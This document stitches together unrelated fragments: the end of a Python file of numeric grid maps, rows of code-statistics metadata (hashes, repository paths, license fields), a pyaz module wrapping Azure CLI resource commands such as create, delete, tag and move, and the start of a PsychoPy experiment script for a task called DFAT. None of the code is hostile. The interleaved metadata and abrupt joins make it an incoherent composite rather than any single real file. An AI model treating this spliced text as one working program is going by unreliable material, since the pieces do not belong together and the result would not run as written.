[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
openBot = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
openBotHall = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
""" [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
"""
| 86.845238
| 97
| 0.442129
| 9,612
| 21,885
| 1.006658
| 0.001561
| 1.034312
| 1.449773
| 1.855312
| 0.992146
| 0.992146
| 0.992146
| 0.992146
| 0.992146
| 0.992146
| 0
| 0.485795
| 0.096093
| 21,885
| 252
| 98
| 86.845238
| 0.003336
| 0.000685
| 0
| 0.930556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
142745156023a2dec6586b6ac306c21912cfd8de
| 12,846
|
py
|
Python
|
pyaz/resource/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/resource/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/resource/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | 1
|
2022-02-03T09:12:01.000Z
|
2022-02-03T09:12:01.000Z
|
'''
Manage Azure resources.
'''
from .. pyaz_utils import _call_az
from . import link, lock
def create(properties, api_version=None, id=None, is_full_object=None, latest_include_preview=None, location=None, name=None, namespace=None, parent=None, resource_group=None, resource_type=None):
'''
create a resource.
Required Parameters:
- properties -- a JSON-formatted string containing resource properties
Optional Parameters:
- api_version -- The api version of the resource (omit for the latest stable version)
- id -- Resource ID.
- is_full_object -- Indicate that the properties object includes other options such as location, tags, sku, and/or plan.
- latest_include_preview -- Indicate that the latest api-version will be used regardless of whether it is preview version (like 2020-01-01-preview) or not. For example, if the supported api-version of resource provider is 2020-01-01-preview and 2019-01-01: when passing in this parameter it will take the latest version 2020-01-01-preview, otherwise it will take the latest stable version 2019-01-01 without passing in this parameter
- location -- Location. Values from: `az account list-locations`. You can configure the default location using `az configure --defaults location=<location>`.
- name -- The resource name. (Ex: myC)
- namespace -- Provider namespace (Ex: 'Microsoft.Provider')
- parent -- The parent path (Ex: 'resA/myA/resB/myB')
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
- resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
'''
return _call_az("az resource create", locals())
def delete(api_version=None, ids=None, latest_include_preview=None, name=None, namespace=None, parent=None, resource_group=None, resource_type=None):
'''
Delete a resource.
Optional Parameters:
- api_version -- The api version of the resource (omit for the latest stable version)
- ids -- One or more resource IDs (space-delimited). If provided, no other "Resource Id" arguments should be specified.
- latest_include_preview -- Indicate that the latest api-version will be used regardless of whether it is preview version (like 2020-01-01-preview) or not. For example, if the supported api-version of resource provider is 2020-01-01-preview and 2019-01-01: when passing in this parameter it will take the latest version 2020-01-01-preview, otherwise it will take the latest stable version 2019-01-01 without passing in this parameter
- name -- The resource name. (Ex: myC)
- namespace -- Provider namespace (Ex: 'Microsoft.Provider')
- parent -- The parent path (Ex: 'resA/myA/resB/myB')
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
- resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
'''
return _call_az("az resource delete", locals())
def show(api_version=None, ids=None, include_response_body=None, latest_include_preview=None, name=None, namespace=None, parent=None, resource_group=None, resource_type=None):
'''
Get the details of a resource.
Optional Parameters:
- api_version -- The api version of the resource (omit for the latest stable version)
- ids -- One or more resource IDs (space-delimited). If provided, no other "Resource Id" arguments should be specified.
- include_response_body -- Use if the default command output doesn't capture all of the property data.
- latest_include_preview -- Indicate that the latest api-version will be used regardless of whether it is preview version (like 2020-01-01-preview) or not. For example, if the supported api-version of resource provider is 2020-01-01-preview and 2019-01-01: when passing in this parameter it will take the latest version 2020-01-01-preview, otherwise it will take the latest stable version 2019-01-01 without passing in this parameter
- name -- The resource name. (Ex: myC)
- namespace -- Provider namespace (Ex: 'Microsoft.Provider')
- parent -- The parent path (Ex: 'resA/myA/resB/myB')
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
- resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
'''
return _call_az("az resource show", locals())
def list(location=None, name=None, namespace=None, resource_group=None, resource_type=None, tag=None):
'''
List resources.
Optional Parameters:
- location -- Location. Values from: `az account list-locations`. You can configure the default location using `az configure --defaults location=<location>`.
- name -- The resource name. (Ex: myC)
- namespace -- Provider namespace (Ex: 'Microsoft.Provider')
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
- resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
- tag -- a single tag in 'key[=value]' format. Use '' to clear existing tags.
'''
return _call_az("az resource list", locals())
def tag(tags, api_version=None, ids=None, is_incremental=None, latest_include_preview=None, name=None, namespace=None, parent=None, resource_group=None, resource_type=None):
'''
Tag a resource.
Required Parameters:
- tags -- space-separated tags: key[=value] [key[=value] ...]. Use '' to clear existing tags.
Optional Parameters:
- api_version -- The api version of the resource (omit for the latest stable version)
- ids -- One or more resource IDs (space-delimited). If provided, no other "Resource Id" arguments should be specified.
- is_incremental -- The option to add tags incrementally without deleting the original tags. If the key of new tag and original tag are duplicated, the original value will be overwritten.
- latest_include_preview -- Indicate that the latest api-version will be used regardless of whether it is preview version (like 2020-01-01-preview) or not. For example, if the supported api-version of resource provider is 2020-01-01-preview and 2019-01-01: when passing in this parameter it will take the latest version 2020-01-01-preview, otherwise it will take the latest stable version 2019-01-01 without passing in this parameter
- name -- The resource name. (Ex: myC)
- namespace -- Provider namespace (Ex: 'Microsoft.Provider')
- parent -- The parent path (Ex: 'resA/myA/resB/myB')
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
- resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
'''
return _call_az("az resource tag", locals())
def move(destination_group, ids, destination_subscription_id=None):
'''
Required Parameters:
- destination_group -- the destination resource group name
- ids -- the space-separated resource ids to be moved
Optional Parameters:
- destination_subscription_id -- the destination subscription identifier
'''
return _call_az("az resource move", locals())
def invoke_action(action, api_version=None, ids=None, latest_include_preview=None, name=None, namespace=None, parent=None, request_body=None, resource_group=None, resource_type=None):
'''
Invoke an action on the resource.
Required Parameters:
- action -- The action that will be invoked on the specified resource
Optional Parameters:
- api_version -- The api version of the resource (omit for the latest stable version)
- ids -- One or more resource IDs (space-delimited). If provided, no other "Resource Id" arguments should be specified.
- latest_include_preview -- Indicate that the latest api-version will be used regardless of whether it is preview version (like 2020-01-01-preview) or not. For example, if the supported api-version of resource provider is 2020-01-01-preview and 2019-01-01: when passing in this parameter it will take the latest version 2020-01-01-preview, otherwise it will take the latest stable version 2019-01-01 without passing in this parameter
- name -- The resource name. (Ex: myC)
- namespace -- Provider namespace (Ex: 'Microsoft.Provider')
- parent -- The parent path (Ex: 'resA/myA/resB/myB')
- request_body -- JSON encoded parameter arguments for the action that will be passed along in the post request body. Use @{file} to load from a file.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
- resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
'''
return _call_az("az resource invoke-action", locals())
def update(add=None, api_version=None, force_string=None, ids=None, include_response_body=None, latest_include_preview=None, name=None, namespace=None, parent=None, remove=None, resource_group=None, resource_type=None, set=None):
'''
Update a resource.
Optional Parameters:
- add -- Add an object to a list of objects by specifying a path and key value pairs. Example: --add property.listProperty <key=value, string or JSON string>
- api_version -- The api version of the resource (omit for the latest stable version)
- force_string -- When using 'set' or 'add', preserve string literals instead of attempting to convert to JSON.
- ids -- One or more resource IDs (space-delimited). If provided, no other "Resource Id" arguments should be specified.
- include_response_body -- Use if the default command output doesn't capture all of the property data.
- latest_include_preview -- Indicate that the latest api-version will be used regardless of whether it is preview version (like 2020-01-01-preview) or not. For example, if the supported api-version of resource provider is 2020-01-01-preview and 2019-01-01: when passing in this parameter it will take the latest version 2020-01-01-preview, otherwise it will take the latest stable version 2019-01-01 without passing in this parameter
- name -- The resource name. (Ex: myC)
- namespace -- Provider namespace (Ex: 'Microsoft.Provider')
- parent -- The parent path (Ex: 'resA/myA/resB/myB')
- remove -- Remove a property or an element from a list. Example: --remove property.list <indexToRemove> OR --remove propertyToRemove
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
- resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
- set -- Update an object by specifying a property path and value to set. Example: --set property1.property2=<value>
'''
return _call_az("az resource update", locals())
def wait(api_version=None, created=None, custom=None, deleted=None, exists=None, ids=None, include_response_body=None, interval=None, name=None, namespace=None, parent=None, resource_group=None, resource_type=None, timeout=None, updated=None):
'''
Place the CLI in a waiting state until a condition of a resources is met.
Optional Parameters:
- api_version -- The api version of the resource (omit for the latest stable version)
- created -- wait until created with 'provisioningState' at 'Succeeded'
- custom -- Wait until the condition satisfies a custom JMESPath query. E.g. provisioningState!='InProgress', instanceView.statuses[?code=='PowerState/running']
- deleted -- wait until deleted
- exists -- wait until the resource exists
- ids -- One or more resource IDs (space-delimited). If provided, no other "Resource Id" arguments should be specified.
- include_response_body -- Use if the default command output doesn't capture all of the property data.
- interval -- polling interval in seconds
- name -- The resource name. (Ex: myC)
- namespace -- Provider namespace (Ex: 'Microsoft.Provider')
- parent -- The parent path (Ex: 'resA/myA/resB/myB')
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
- resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
- timeout -- maximum wait in seconds
- updated -- wait until updated with provisioningState at 'Succeeded'
'''
return _call_az("az resource wait", locals())
| 70.972376
| 437
| 0.731823
| 1,850
| 12,846
| 5.016757
| 0.116216
| 0.035557
| 0.015516
| 0.029092
| 0.765543
| 0.740868
| 0.736882
| 0.725245
| 0.720612
| 0.720612
| 0
| 0.022787
| 0.173284
| 12,846
| 180
| 438
| 71.366667
| 0.85113
| 0.793554
| 0
| 0
| 0
| 0
| 0.07474
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.45
| false
| 0
| 0.1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
14a0a761b572574c7f31ac35eb23a1ca75a4d11b
| 62,705
|
py
|
Python
|
tasks/python/_dfat/dfat.py
|
risoms/mdl-R56
|
3f6f62f9e5f1aaf03e604c898e3d4b6b006f3436
|
[
"MIT"
] | null | null | null |
tasks/python/_dfat/dfat.py
|
risoms/mdl-R56
|
3f6f62f9e5f1aaf03e604c898e3d4b6b006f3436
|
[
"MIT"
] | null | null | null |
tasks/python/_dfat/dfat.py
|
risoms/mdl-R56
|
3f6f62f9e5f1aaf03e604c898e3d4b6b006f3436
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
This experiment was created using PsychoPy2 Experiment Builder (v1.84.2),
on January 11, 2017, at 11:44
If you publish work using this script please cite the PsychoPy publications:
Peirce, JW (2007) PsychoPy - Psychophysics software in Python.
Journal of Neuroscience Methods, 162(1-2), 8-13.
Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy.
Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008
"""
from __future__ import absolute_import, division
from psychopy import gui, visual, core, data, event, logging, sound
from psychopy.constants import (NOT_STARTED, STARTED, FINISHED)
from numpy import random
import os # handy system and path functions
import sys # to get file system encoding
###-------added by me
#imports
from psychopy import parallel
#constants
stim_duration = 60 #stim duration (60)
numpad_list = ['num_1','num_2','num_3','num_4','num_5','num_6','num_7']
pport = parallel.ParallelPort(address='0xDFF8')
pport.setData(int(0))
prac_ttl = 1
# Ensure that relative paths start from the same directory as this script
_thisDir = os.path.dirname(os.path.abspath(__file__)).decode(sys.getfilesystemencoding())
os.chdir(_thisDir)
# Store info about the experiment session
expName = 'DFAT' # from the Builder filename that created this script
expInfo = {u'session': u'001', u'participant': u''}
try: #look for pipe from app
expInfo['participant'] = '%s'%(sys.argv[1])
expInfo['session'] = '001'
except IndexError: #if no pipe, run normally
print ('ran without app')
dlg = gui.DlgFromDict(dictionary=expInfo, title=expName)
if dlg.OK == False:
print ('app closed')
core.quit() # user pressed cancel
expInfo['date'] = data.getDateStr() # add a simple timestamp
expInfo['expName'] = expName
print 'subject:',expInfo['participant']
print 'exp:',expName
# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc
filename = _thisDir + os.sep + u'data/%s_%s' % (expInfo['participant'], expName)
# An ExperimentHandler isn't essential but helps with data saving
thisExp = data.ExperimentHandler(name=expName, version='',
extraInfo=expInfo, runtimeInfo=None,
originPath=None,
savePickle=True, saveWideText=True,
dataFileName=filename)
# save a log file for detail verbose info
logFile = logging.LogFile(filename+'.log', level=logging.EXP)
logging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file
endExpNow = False # flag for 'escape' or other condition => quit the exp
# Start Code - component code to be run before the window creation
# Setup the Window
win = visual.Window(
size=[1920,1080], fullscr=True, screen=0,
allowGUI=False, allowStencil=False,
monitor='testMonitor', color=[1.000,1.000,1.000], colorSpace='rgb',
blendMode='avg', useFBO=True,
units='pix')
# store frame rate of monitor if we can measure it
expInfo['frameRate'] = win.getActualFrameRate()
if expInfo['frameRate'] != None:
frameDur = 1.0 / round(expInfo['frameRate'])
else:
frameDur = 1.0 / 60.0 # could not measure, so guess
# Initialize components for Routine "introduction"
introductionClock = core.Clock()
intro_image = visual.ImageStim(
win=win, name='intro_image',
image=None, mask=None,
ori=0, pos=[0, 0], size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
intro_sound = sound.Sound(u'A', secs=-1)
intro_sound.setVolume(1)
#loop counter-practice
intro_repeat = 0
# Initialize components for Routine "instructions"
instructionsClock = core.Clock()
inst_image = visual.ImageStim(
win=win, name='inst_image',
image=None, mask=None,
ori=0, pos=[0, 0], size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
inst_sound = sound.Sound(u'A', secs=-1)
inst_sound.setVolume(1)
inst_repeat = 0
# Initialize components for Routine "task"
taskClock = core.Clock()
task_image = visual.ImageStim(
win=win, name='task_image',
image=None, mask=None,
ori=0, pos=[0, 0], size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
# Initialize components for Routine "relax"
relaxClock = core.Clock()
relax_image = visual.ImageStim(
win=win, name='relax_image',
image="Instructions/png/r-0.png", mask=None,
ori=0, pos=[0, 0], size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
relax_sound = sound.Sound(u'A', secs=-1)
relax_sound.setVolume(1)
# Initialize components for Routine "survey"
surveyClock = core.Clock()
survey_image = visual.ImageStim(
win=win, name='survey_image',
image=None, mask=None,
ori=0, pos=[0, 0], size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
# Initialize components for Routine "block_finish"
block_finishClock = core.Clock()
block_finish_image = visual.ImageStim(
win=win, name='block_finish_image',
image=None, mask=None,
ori=0, pos=[0, 0], size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
block_finish_sound = sound.Sound(u'A', secs=-1)
block_finish_sound.setVolume(1)
bf_repeat = 0
